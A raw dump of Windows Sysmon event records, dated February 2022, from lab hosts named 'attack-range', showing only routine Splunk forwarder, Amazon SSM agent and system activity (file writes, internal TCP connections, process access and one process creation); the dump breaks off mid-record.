11:18:38.123{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADB3EEB57735BD7792E740E47B460E5,SHA256=FAEF71FDBA01D85F9299CD6C3B53C592ACA101B2A1EEDD5D141DC195BFB3E428,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:38.095{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9308C8A305EEE67BB143883AAF1707,SHA256=E37A30C32BE073BCB22B659DE71D82B0761AB90F7CDCD475234D47434145956C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:39.143{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B117573D07BD919283464B6CDB5D4AA,SHA256=599D04587743DFA41CDF0C1A3742ADE4B12252FD569B5CABC5A17DFEFBEE5F64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:39.518{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-161MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:36.701{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51668-false10.0.1.12-8000- 23542300x8000000000000000221669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:39.141{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9894E76BB41BBE34BAD324477F163B57,SHA256=9C6F051C3BFE8E693DAF959D1530E9E453DB573A6900EB9FDC2EF7217766CE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:40.512{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:40.143{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F1C6F8D415331D556800AD33D3C89E7,SHA256=0968CF900A511E523E8C3C86AD48464572D50F2F3233D45C96A3824C141AD2C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:40.525{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-162MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:40.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36D4201F0A412DD5ED47BD2EC34583B,SHA256=BEFEEB3BC63CC9AE31E7F1816D3FCDF8E6E078218A2E6960622A136AAF17BFAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:41.197{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CB2B73E8EAC46D29F920347737DB68,SHA256=D4B20027A65C204B0C590CCE0E6A441436CADA6ABFB0E93370EA4FD01E80D77B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:41.158{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53146A0DC79EB1700C847E6F3C55AF90,SHA256=93CB20FBBF169E7BFD9D578B5CE242A4CCCCEBA3A861BB9F2705F3BC76D27616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:42.197{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1F33B6261286FF026DA4633BC72BD82,SHA256=7D16C4AF9E5A16BC05AE3F9210C37078FF57EEB78B86BD1532B8EDD5C960E598,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:40.600{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49484-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000297831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:39.963{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49483-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000297830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:42.158{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B9A40FB62B5240823B88CAE324FB250,SHA256=BE3AF988DB7031AB237D842C657BC7606E9BF1B1B0A3232E544CBD1403F49509,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:43.173{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD48A4D41E4A3C46B9B937CDBF88196,SHA256=2CEE4747229FC4965B0377812B220ACE3C62A14FD4C372A537E670345BFBC431,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:43.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58E4C59A2C317A8E9E970C69D89B90E,SHA256=31E320E41B04C347B5A47A92C13BA7DF55E4955583A8B975A0A1EBC58777A0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:44.192{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F32EB097443DD234710EACD0871EB53C,SHA256=77156580AFACCF754EA24D6078A34E83BF5C000C4292D7620A39733061B52D1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1814-6216-1E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1814-6216-1E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1814-6216-1E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.853{4F8D34B0-1814-6216-1E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000221692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:42.539{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51669-false10.0.1.12-8000- 10341000x8000000000000000221691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.400{4F8D34B0-1814-6216-1D05-000000003902}2720764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79D756BA2E9DDF69AAB82FCE240BEBDF,SHA256=D3ADC05E7F6D8D6D19F2045CCC98088B89F63D39D2DDCD7A2E9C7A4B369D73E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1814-6216-1D05-000000003902}2720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 